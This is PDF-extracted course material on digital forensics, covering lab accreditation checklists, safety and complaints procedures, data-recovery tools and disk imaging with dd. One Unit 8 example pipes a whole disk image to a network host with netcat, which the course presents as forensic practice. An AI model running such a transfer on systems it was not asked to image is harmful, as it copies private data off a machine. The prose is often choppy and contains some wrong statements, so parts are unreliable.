file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/4.html Page 98 of 135
3/3
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Computer Forensic Laboratory Checklist Samples
Ensure your lab door locks and you have controlled access to the keys and/or Combination. Ensure your cleaning staff and others do not have access to the facility unless they are properly escorted. Ensure the walls and ceiling are constructed in such way that easy access is prevented.(E.g. Preventing someone from climbing over the wall and dropping through the ceiling). Ensure protective mechanisms are in place for disastrous events such as fire, flooding, lightning, and other events common to the environment Ensure there is a physically secure evidence room or locker within the lab with a separate key or combination lock than what′s used to get into the lab. Ensure there are written policies and procedures for lab controls, evidence controls, forensic examinations, and validation of tools and equipment. Ensure a formal case management system is in place. Ensure there is a separate network connection for Internet access that is separate from the forensic examination computer. Ensure the forensic examination computer is isolated from the network. Make certain there is a central place to store documents. It could be in the evidence room or locker if it′s large enough and fits your storage needs. Ensure there is a designated document librarian for centralized and consistent control of case data. Ensure there is a standard validated field kit including the hardware and software tools you use the most in your investigations. Ensure you have extra copies of forms, like Chain of Custody forms and Evidence Receipts. Ensure your hardware and storage are consistent with the environment you commonly investigate, including access to special equipment, extra drives and other needed media. Ensure you have hardware and/or software tools for: Write protection Acquisition Data recovery/discovery Internet history, Images, Email Password cracking file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/5.html Page 99 of 135
1/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Mobile devices Eg : PDA / cell phone Malware/virus detection Binary analysis Large storage analysis Multifunction use Eg. : EnCase, Paraben Tools, FTK, SMART
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/5.html Page 100 of 135
2/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
LABORATORY EXAMINATIONS
Any anticontamination precautions or requirements of the particular case. Eg : presence of narcotics, poisons, explosives, etc. It must be considered before any examination proceeds, and the minimum precautions necessary are identified and then implemented. All items submitted for forensic examination should first be examined for the integrity of their packaging. Any deficiency in the packaging which may compromise the value of a laboratory examination should be grounds for refusal to carry out the laboratory examination. All personnel involved in examinations of computer systems should take adequate precautions to minimize any risks from electrical hazards or static. Also some items need to be protected from Electro Static Discharge (ESD). Teams engaged upon the recovery of digital evidence should maintain a set of written procedures particular to their requirements. But within the broad framework of an accepted national or international standard. In the UK, Law Enforcement agencies can follow the principles documented in the ACPO Good Practice Guide for Computer based Evidence and procedures should be available describing how these principles are followed. The relevant local procedures manual should be specific, comprehensive and understood by all members of staff in that unit. To laboratory examinations we should search the following things. Case Records Analysis Protocols
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/6.html Page 101 of 135
1/1
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
HEALTH AND SAFETY in digital forensic
Health and safety considerations are extremely important. It is important in all of the work carried out at all stages of the forensic process. Personnel engaged in the examination of various forms of digital technology. It should operate in accordance with the regulations of the pertinent government, environmental, safety authorities and laboratory policy. General laboratory safety manuals available. It should be available to all laboratory personnel. These should contain details of how to conduct a risk assessment and how to develop safe systems of work, both at the scene of incident and in the laboratory. The risks identified, including working with large quantities of offensive material and the associated safe systems of work should be communicated to all personnel likely to be exposed to the risks. This is especially important when this group includes nonscientists or members of the public (e.g. in court). The relevant safe systems of work should be documented as an integral part of all standard operating procedures. Laboratory personnel should be responsible for maintaining their assigned work areas in a safe, clean and orderly manner. Appropriate safety equipment as outlined in the various procedures, It should be made available near the work sites by the laboratory management. It is the responsibility of the laboratory personnel to use them where required. All staff should be instructed on how to proceed in the event of fire, bomb threats, spillage of hazardous chemicals or electrical accidents, etc. All be required to practice these procedures once a year. All these practice of fire, bomb threats, spillage of hazardous chemicals or electrical accidents should be documented. A designated person should be trained and competent to render “qualified first aid” to those doing casework involving digital technology. It is very important thing.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/7.html Page 102 of 135
1/1
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Introduction to COMPLAINTS PROCEDURE
Complaints, possible miscarriages of justice and other anomalies need to be reviewed. It is to identify major issues and trends It is to be brought to the attention of senior management for action.
COMPLAINTS PROCEDURE The parent laboratory or organisation should investigate all complaints made by any providers of casework or others (e.g. courts) as well as any anomalies relating to the Services provided which are brought to its attention. Where appropriate the audit. Process will be used to assess the extent of any underlying problems. All customer complaints should be dealt with as quickly, efficiently and effectively as soon as possible. The process should aim to resolve misunderstandings and it will be correct errors, where possible. All complaints should be recorded and investigated either by local or senior management, as appropriate. Where necessary, corrective actions are taken to prevent recurrence of the problem. Any anomaly which could affect the validity of any results or materials supplied to customers will be dealt with promptly through an improvement and Corrective Action procedure. All members of staff are responsible for taking prompt action on any such anomaly which comes to their notice and ensuring that possible implications are reported. The appropriate level of management should ensure that corrective action includes advising customers, recalling reports or items and retesting or reissuing reports as appropriate. If such an anomaly is recognized specifically as a result of a proficiency test or Quality Assurance Trial, local procedures described in QMS should be followed with, wherever possible, a time limit applied for resolving the matter. Any possible miscarriage of justice brought to the attention of a laboratory either by an external body or by a member of staff, It must be immediately dealt with in accordance with local QMS procedures covering the Possible or Alleged Miscarriages of Justice.
REFERENCES The following are the references for health and safety procedures in digital forensic.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/8.html Page 103 of 135
1/2
Standard Operating Procedures: Digital Forensic Laboratory Accreditation Standards 8/17/2015
scorm content
Interpol Computer Crime Manual – 19922001. ACPO Good Practice Guide for Computer based electronic evidence, Issue 5, 2008.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit6/assets/8.html Page 104 of 135
2/2
UNIT - 7 Acquiring Data, Duplicating Data, and Recovering Deleted files
Page 105 of 135
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Digital forensics
Digital forensics is a branch of forensic science sometimes it is known as digital forensic science. It encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
Digital forensics software The following are the digital forensics software Forensic Toolkit Mobile Phone Examiner plus MPE+ AD Lab AD Enterprise Silent Runner Mobile Digital Decryption AD Triage Live Response Overcome case backlog with distributed processing and largescale, realtime collaboration. Built on FTK® technology, AD Enterprise allows you to investigate thousands of computers simultaneously from a remote location. With deepdive analysis of both volatile /memory and static data, as well as batch remediation, it’s a valuable incident response and enterprise investigations solution. Silent Runner network forensics software operates like a surveillance camera on your network. Monitor, capture and replay network communications for investigations and incident response. Locked out? Get back in. Password Recovery Toolkit® and Distributed Network Attack® are relied on by Fortune 500 corporations, law enforcement and government agencies to recover passwords from more than 100 applications. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 106 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Our decryption software is The Key to Cracking It®. AD Triage is a portable solution. It allows onscene forensic acquisition of volatile and static data. It can be used on both live and shut down computers, It is the ideal solution for field examiners, First responders and even nontechnical personnel. Live Response is a USB key. It enables first responders, investigators and IT security professionals. Used to collect the live volatile data, which will be lost once the computer system is shut down.
Investigation Tools The following are the Digital Forensic Investigation Tools for System Admins SANS SIFT Pro Discover Basic Volatility The Sleuth Kit (+Autopsy) FTK Imager Linux ‘dd’ CAINE Oxygen Forensic Suite2013 Standard Free Hex Editor Neo Bulk Extractor DEFT Xplico Last Activity View Digital Forensic Framework Mandiant Red Line Plain Sight HxD HELIX3 Free file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 107 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Net Sleuth P2 explorer Free
Digital Forensics Framework The abbreviation of Digital Forensics Framework is DFF. DFF is a free and Open Source computer forensics software. It built on top of a dedicated Application Programming Interface (API).
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/2.html Page 108 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Data
Data are manipulated either as values or variables by encoding them into information. Data which are derived through reason or which are employed in the course of behaving, are collectively called knowledge. Data are typically the results of measurements, It can be visualized as graphs or images.
Datum Datum means "an item given". In cartography, geography, nuclear magnetic resonance and technical drawing. It often refers to a reference datum where from distances to all other data are measured.
Meaning of data Data are extracted from information, The knowledge is derived from data. Data are the collections of information. Through information we acquiring knowledge.
Data vs Information Beynon Davies uses the concept of a sign to distinguish between data and information; data are symbols while information occurs when the symbols are used to refer to something.
Recover lost or deleted files To recover the lost or deleted files from the best free undelete software. Some of the best free undelete software as follows ; Recuva Free Undelete 360 To recover the lost or deleted files from the best free undelete software. Some of the best free undelete software as follows ; MiniTool Partition Recovery Wise Data Recovery
Recuva Free file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 109 of 135
1/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Conveniently available in a portable version, Recuva Freeis very easy to use. A wizard asks you what type of files you′re looking for, and where to search, then scans your system at speed (FAT, exFAT and NTFS file systems are supported). Any files found are listed (with previews for images), and you can restore anything you need in a couple of clicks.
Undelete 360 Undelete 360 is the free version of a commercial product, and so leaves out some useful features (file filtering, previews and so on). These still appear in the interface, though, and suggest you upgrade if you ever click on them, which can be annoying. There are no restrictions on the amount or size of the files you can recover, though, and otherwise the program is very simple to use: point it at a drive, it′ll scan for deleted files, then you can view particular file types (JPGs, PDFs, videos and more) by choosing them from a tree. Scanning speed isn′t great, but Undelete 360 can recover files that other programs miss , and so it′s definitely worth considering.
Mini Tool Partition Recovery Standard undelete programs are perfect for recovering a few files, but if you′ve lost an entire partition then you′ll probably benefit from a specialist application like MiniTool Partition Recovery. The free (for personal use) program has a wizardbased interface. It makes it very straightforward to use. Point Mini Tool Partition Recovery at the problem drive, specify the area to be searched, and it′ll scan for the missing partition. A report will let you know what the program has found, and you can recover the partition in a few seconds. You don′t get a bootable recovery disc here, so if your system partition is damaged then Mini Tool Partition Recovery won′t help you very much. Otherwise, though, it provides a quick and easy way to locate and restore lost partitions.
Wise Data Recovery It′s hard to imagine how any undelete tool could be simpler than Wise Data Recovery. There are no menus, no complicated options or dialog boxes: all you do is choose a drive, click Scan, and wait as the program locates any deleted files. Select what you need, click Recover, and that′s just about it.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 110 of 135
2/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Wise Data Recovery doesn′t seem to work with FATbased drives, though, recovering nothing from our test USB drive. It′s only free for personal use, too. But if you just need something quick and easy to recover files from NTFS drives then it should probably be on your shortlist.
How to Restore Deleted Partition? There is three steps To restore the deleted partition. Step 1: Scan Hard Disk for deleted partitions In this step first scan the hard disk for deleted partitions. There is three steps To restore the deleted partition. Step 2: Select partition and open "Restore Partition" dialog In this step select the partition and then Restore partition dialog. There is three steps To restore the deleted partition. Step 3: Set restore options in "Restore Partition" dialog and run restore. In this step set the restore options in Restore partition dialog. Then run restore. Stellar Phoenix Partition Recovery : Professional partition recovery software that works impressively stellar to accomplish the process of recovering lost, deleted, or inaccessible data on Windows based drives and removable media. Key Features of Stellar Phoenix Partition Recovery : The key features of stellar phoenix partition recovery are as follows ; Recovers missioncritical files from Windows hard drive and supported external media ′Raw Recovery′ feature to flawlessly recover files from severely corrupt media Recovers deleted emails in MS Outlook and Outlook Express Recovers files from damaged or corrupt optical media Support for broad range of files types, including documents, photos, and multimedia files Salient features of this Windows recovery tool : Some salient features of this Windows recovery tool are as follows ; Drive Recovery Lost Partition Recovery Raw Recovery Optical Media Recovery PreRecovery Preview of Files Advance Tools : The following are the some Advance Tools
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 111 of 135
3/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
System Startup Disc SMART Image Your Hard Disk
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/3.html Page 112 of 135
4/4
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Data Recovery software
Linux is a Data Recovery software. It helps you recover lost or inaccessible data. It is recovered from any Ext4, Ext3, Ext2, FAT32, FAT16, and FAT12 file system based LINUX volumes. Recovers all your lost files, directories, and hard drive volumes. Recovers from all available hard drive types, including SCSI, SATA, EIDE, and IDE. Userfriendly interface; no technical expertise required.
Free Utilities S.M.A.R.T. : Feature that monitors health status of hard drive and issues warning messages intelligently. Drive Imaging : Imaging of the entire hard drive, volumes or any selected region. Hard drive cloning :– Makes an exact replica of the hard drive.
Features of Linux Linux Deleted File Recovery Quick Recovery Advance Recovery Lost or Deleted Volume Recovery Allows Scanning for Specific File Types Mask to Narrow Scan Result Provides Preview of Recoverable Files Find Required Files and Perform Selective Recovery Resume Recovery from Saved Image or Scan Information Saves Recovered Files to any Location Allows Compressing Recovered Files Disk Imaging Drive Cloning SMART file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 113 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Deleted File Recovery Stellar Linux recovery software efficiently recovers all your accidentally/intentionally deleted documents, photos, audios, videos, and other multimedia files. In case of recovering deleted files from FAT file system based volumes, the software provides two different scanning methods – ‘Quick Scan’ and ‘Deep Scan’. Deep Scan takes relatively more time, but yields better chance of file recovery.
Quick Recovery With the ′Quick Recovery′ option of the software, you can recover lost data by scanning any volume or previously saved image of the volume. The recovery method is significantly fast and efficient enough to recover almost all your data back.
Advance Recovery The ′Advance Recovery′ option of the software helps recovering all your lost, deleted, or inaccessible data. It is done by performing extensive search operation on the selected volume or its image file. This recovery option is comparatively slower than Quick Recovery, but ensures more chance of recovering lost files.
Deleted Volume Recovery This data recovery Linux software provides an innovative option to search and list all lost/deleted volumes in the system. The software finds all ext4, ext3, ext2, FAT file system based volumes, which have been completely deleted from the hard drive and allows recovering data from them using Quick Recovery, Advance Recovery, or Deleted File Recovery method.
Scanning for Specific File Types The software allows you to scan only for the selected file types. Apart from this, the software provides options to add new files to the list, edit an existing file type, and remove file types from the list.
Narrow Scan Result The ′Mask′ option of the software helps you narrow down the entire scan result. Once the scanning process gets completed, you can apply mask on the scan list to create a new tree, containing only your required file types. The software provides several masking options, including ′File of type′, ′Size from′ (KB), and file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 114 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Date.
Preview of Recoverable Files After completion of the scanning operation, this data recovery Linux software ensures recovery chances of files by showing the preview of all recoverable files in the selected volume. You can click a file from the scanned list and preview the same in the upper pane of the interface.
Find Required Files With the ′Find′ option in Stellar Linux recovery, you can locate the required files and help performing selective recovery. This option further gives several suboptions to search only your needed files from the huge pool of scanned file list and recover them smoothly.
Resume Recovery from Saved image The software allows you to save the scan information and resume the recovery operation, any time in future. This wonderful utility provides options to resume the recovery process from any previously saved scan information or image file of the drive.
Saves Recovered Files Stellar Phoenix Linux Data Recovery allows you to save the recovered files to any storage media connected to the system. You can save the recovered data onto your local disk or any File Transfer Protocol (FTP) server.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/4.html Page 115 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Recycle Bin
The Recycle Bin is a location. Recyle bin is like a folder Where deleted files are temporarily stored. It can found in PC. It can also found in laptops. The Recycling Bin allows users to recover files that have been deleted in Windows. By default, Microsoft Windows 95 and above uses 10% of available disk space to save any deleted files in case any file is accidentally deleted it can be recovered from the Recycle Bin.
View deleted files in Recycle Bin If any file has been deleted in Windows, it is automatically moved to the Recycle Bin. Users can identify if files are in the Recycle Bin by looking at the Recycle Bin icon. By default, the icon will look like the icon to the right, an empty Recycle Bin. When files have been deleted, the Recycle Bin will be full of trash. If the Recycle Bin is full, users can view the files in the Recycle Bin by doubleclicking the Recycle Bin icon.
Manage the Recycle Bin If you want to modify how much space Windows used to store deleted files for all drives or independently, you can rightclick on the Recycle Bin icon and click Properties. In the Recycle Bin Properties window, you can adjust how much space the Recycle Bin takes by dragging the slider left to right, or completely disable the Recycle Bin feature.
Empty the Recycle Bin To empty the Recycle Bin, rightclick the Recycle Bin icon then click Empty Recycle Bin.
How to know the empty recycle bin When the Recycle Bin is empty it shows an icon of a Recycle Bin with no trash. An icon with trash when it is still full. Also, when empty, the message "This folder is empty" is shown when you open the Recycle Bin. Should I empty the Recycle Bin ? If you feel that none of the files in the Recycle Bin will ever need to be restored, it′s recommended you empty the Recycle Bin at your convince.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 116 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
When should I empty the Recycle Bin ? Anytime you want to clean the contents of your hard drive or when you′re running out of disk space it′s recommended you empty the Recycle Bin.
View recover files from the Recycle Bin To view recover files from the recycle bin. Just use the right click of the mouse.
Recovering a deleted file from the Windows Recycle Bin Get to the Desktop where you can see the Recycle Bin icon. If there is any files in the Recycle Bin the icon should appear with trash in the Bin. Just click the icon, and then move. Doubleclick the Recycle Bin icon to open the window displaying all files in the Recycle Bin. If no files are seen skip to the below paragraph. To restore any of the deleted items you can follow any of the steps below. Highlight the files you want to restore, right click the file and then select the Restore option. This will restore the file from the original location it was deleted.
Trash Trash (computing) is a way. By which operating systems dispose of unwanted files. Called a "Recycle Bin" on Microsoft Windows. Trash (video game), an RTS with the capacity for multiplayer. It matches of up to 32 players to compete on a single map.
Implementations Mac OS and Mac OS X, with Macintosh Finder, as "Trash" (or Wastebasket in defunct localizations). Microsoft Windows, with Windows Explorer, as "Recycle Bin". GNOME (Linux), with Nautilus. KDE (Linux), with Konqueror and Dolphin. Xfce (Linux), with Thunar. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 117 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
IN Microsoft Windows By rightclicking on a file and then selecting delete from the menu. Selecting the file and then pressing the delete key. Selecting delete from the Task pane in Windows XP. Selecting the file and choosing delete from the File menu (in Windows XP Explorer). By dragging and dropping a file into the Recycle Bin icon. From the Send To menu. From a context menu command or some other function in a software application. It is usually configurable.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 118 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Compressing Recovered Files
This Linux partition recovery software provides option to save the recovered files in a compressed ZIP folder. With this option of the software, you can either compress each file individually or compress files into a single ZIP folder.
Bonus Tools Stellar Linux Data Recovery software provides few useful utilities as bonus tools, which can be immensely helpful in protecting your precious data against any impending drive failure.
Disk Imaging The software provides a useful option to create image. It also save the image file of your hard disk or any selected volume. The image file of your media can help you recover all your precious data, in case of volume corruption, deletion, or formatting of the media.
Drive Cloning With Stellar Linux Data Recovery, you can create an exact replica of your hard drive which can help you recover lost data, in case of drive failure. Even, with the cloned copy of your hard drive, you can carry on your ongoing works. It can do without any delay over data recovery.
SMART With the ′SMART′ feature, the software continuously monitors important parameters of the hard drive. It generates warning messages against any impending drive failure. Smart helps you protect your data from instances of unexpected hard drive failure.
Recover the deleted files Open Stellar Phoenix Linux recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the logical drive from which you want to recover the deleted data. Then click on ′Deleted File Recovery′ icon.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 119 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
The software will scan and display all the recoverable files in the tree view. Now, check mark the files that you want to recover and click on ′Recover Selected′ Icon or Select ′Recover. Selected′ from the File menu. Select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′
Receive a data from pen drive Open Stellar Phoenix Linux Data Recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the logical drive from which you want to recover the formatted data. Click on ′Advance Scan′ icon. The software will scan and display all the recoverable files in the tree view. Now, click on ′Recover All′ Select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′.
Recover data from deleted partition Open Stellar Phoenix Linux Data Recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the physical disk displayed in the left pane of the software. Click the first icon i.e. Search for logical drives. Then Select ′Advance Search′. As soon as you click the icon, the software will start searching for the lost logical drives. When searching is complete, all the lost drives in the disk will appear in the left pane in tree view under physical disk.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 120 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Then Double click on the standard/advance drive from which you have to recover the lost data. Then click on ′Advance Scan′ icon. The software will scan and display all the recoverable files in the tree view. Now, click on ′Recover All′ Then select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 121 of 135
3/3
UNIT - 8 Forensic Discovery and Analysis Using Back Track
Page 122 of 135
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Introduction to Forensic tools
The following are the main forensic tools. Imageacquiring tools dd The other main forensic tools are, dd_rescue dcfldd Aimage Afconvert Afinfo Afcat
Imageacquiring tools These tools are aimed at taking an exact replica/image (bitbybit) of the digital media. It is taken to identify for forensic investigation. It is taken without altering the content of the media at all. Acquiring an image of the suspected media helps analyse the media on a highend workstation. It can fulfill the resource requirements of extensive forensic analysis tools. It also working with an image keeps the original media undisturbed and unaltered by any of the analysis activity.
Some important imageacquiring tools Here is a list of some of the important imageacquiring tools available in Backtrack. dd is the popular Linux commandline. It is used for taking images of digital media. They are such as a hard drive, CDROM drive, USB drive, etc., They are also a particular partition of the media.
Raw images Images created using ddlike utilities are called raw images. These are bitbybit copies of the source media. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 123 of 135
1/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
They are without any additions or deletions.
Examples of dd dd if=/dev/sdc of=image.dd dd if=/dev/sdc1 of=image1.dd The first example is dd if=/dev/sdc of=image.dd It takes the image of the whole disk. It includes (sdc), the boot record. It also has partition table. The second example isdd if=/dev/sdc1 of=image1.dd It takes the image of a particular partition (sdc1) of the disk (sdc). A partition image can be mounted via the loop device.
dd Also, instead of storing the image contents in a file, you can pipe the data to a host on the network by using tools such as nc; This is useful when you have space constraints for the image file. dd if=/dev/sdc | nc 192.168.0.2 6000 In this example, the contents of the image file are sent via TCP port 6000 to the host 192.168.0.2, where you can run nc in listening mode as nc l 6000 > image.dd to store the received image contents in the file image.dd.
Limitations of dd However, dd has limitations in cases where the media to be imaged has errors in the form of bad sectors. Thus, a more advanced version of dd, named dd_rescue, is available in Back Track. It isused to image a drive that’s suspected to have one or more bad sectors.
Aimage Aimage is an advanced forensics format (AFF) imaging tool with intelligent error recovery, compression and verification. AFF is an extensible open format for the storage of disk images. It is related forensic metadata.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 124 of 135
2/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
The ability to store relevant metadata such as the serial number of the drive, date of imaging, etc., inside the image itself, is a huge advantage, It is not possible with raw imaging tools such as dd.
Afcat Afcat is a commandline utility. It prints the various contents of an AFF image file. Basic usage is afcat . p — Output data of page number . S — Output data of sector (sector size 512 bytes). l — Output all segment names. L — Output all segment names, arg and segment length.
AIR Imager AIR (Automated Image and Restore) . AIR Imager is a GUI frontend for dd/dcfldd, It offers the features: Use of either dd or dcfldd. Autodetection of IDE and SCSI drives, CDROMs and tape drives. Image compression via gzip/bzip2 Image verification via MD5 or SHA1. Imaging over a TCP/IP network. Splitting images into multiple files. Write zeros to a drive/partition. Creating a large image file filled with zeros. Customization of source and destination devices/files. Skipping of certain bytes of source and destination.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 125 of 135
3/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Introduction of forensic analysis
Forensic analysis is the use of controlled and documented analytical and investigative techniques to identify, collect, examine and preserve digital information.
Forensic analysis Secure State provides a thorough approach to the forensic methodology, and ensures all tools, methodologies and processes are forensically sound it is unaltered. Secure State works as an extension of the corporation’s response team. It help ensure relevant and efficient analysis for three primary areas of forensics: Evidence Acquisition, Evidence Analysis, and Evidence Reporting.
Forensic Acquisition process Computer Forensics Acquisition is the process of acquiring electronic evidence in a manner. It preserves the data and maintains chain of custody. Secure State establishes tested and proven acquisition methodologies, Information gathering and Structured reporting of security related events. Electronic evidence contains the information needed to understand how the events happened, resources or data that may have been affected and mitigation strategies. It is essential that electronic evidence is acquired in a methodical, safe, and Secure manner.
Collecting evidence All evidence collection procedures are reviewed by Secure State’s Incident Response Team. It will be done before acquisition begins. It is an important step. It is also give a shape for forensic analysis. As deemed appropriate, Secure State is the custodian of data and the handler for response, evidence collection and retention, and data or device analysis. All imaging, data collection and documentation will be observed and supervised by a Secure State Lead Investigator.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/3.html Page 126 of 135
1/2
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Primary scope The primary scope for Forensic analysis is to identify unauthorized or anomalous indicators that exist (past or present), how they were deployed, and what capabilities they might have had on the system. After identifying if a successful compromise or malicious software exists, secure State’s primary focus would be directed at determining applicable next steps relating to regulatory or legal compliance, as well as business impact and risk. Applicable next steps would involve Additional forensic acquisition and documentation, collecting and identifying the initial intent of the compromise, remediation, and determining if any private, regulatory or sensitive data was captured or modified.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/3.html Page 127 of 135
2/2
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Documenting and Recording Process
All details, facts and processes will be documented as soon as the Response Team begins analysis on a potential incident or forensic investigation. Secure State will incorporate appropriate media for logging the incident process such as host records, tagging and Labeling systems. Every step taken from the time the incident was detected and recorded to its resolution will be documented, time stamped, reviewed, and signed by the incident handler. Since documentation is an ongoing process throughout the examination, it is vital to be complete, accurate, and comprehensive during the reporting process. Secure State will safeguard data related to incidents since it will contain sensitive system or personnel information, data on exploited vulnerabilities, or information that may be needed for law enforcement. To reduce the risk of sensitive information being disclosed, secure state ensures that access to incident data is restricted and properly stored. In accordance with applicable policies, rules, regulation, or other governing requirements, secure state is responsible for the secure and timely delivery of its investigation reports and all other reports required in accordance with the Incident Response Policies.
Accuracy Many forensic techniques developed in crime labs to aid investigators. They research into their limits or scientific validity was never a priority. Except for DNA, no method has been shown to be able to consistently. It accurately link a piece of evidence to an individual or single source.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/4.html Page 128 of 135
1/1
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Forensic analysts
Forensic analysts work within the justice system, it provides key evidence to criminal investigations. Within the field of forensics there are six general areas of study including, crime laboratory analyst, medical examiner, crime scene examiner, forensic engineer, technical assistance and academic assistance. The main job of all forensic analysts is to help investigators solve crimes. It is an important help to the investigator to identify the criminal.
Responsibilities of forensic analyst The responsibilities of a forensic analyst include classifying and performing tests on specific pieces of evidence lifted from a crime scene. This evidence may include hair, fibers, tissue, and fire arms.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/5.html Page 129 of 135
1/1
UNIT - 9 Privacy and Cyber Forensics
Page 130 of 135
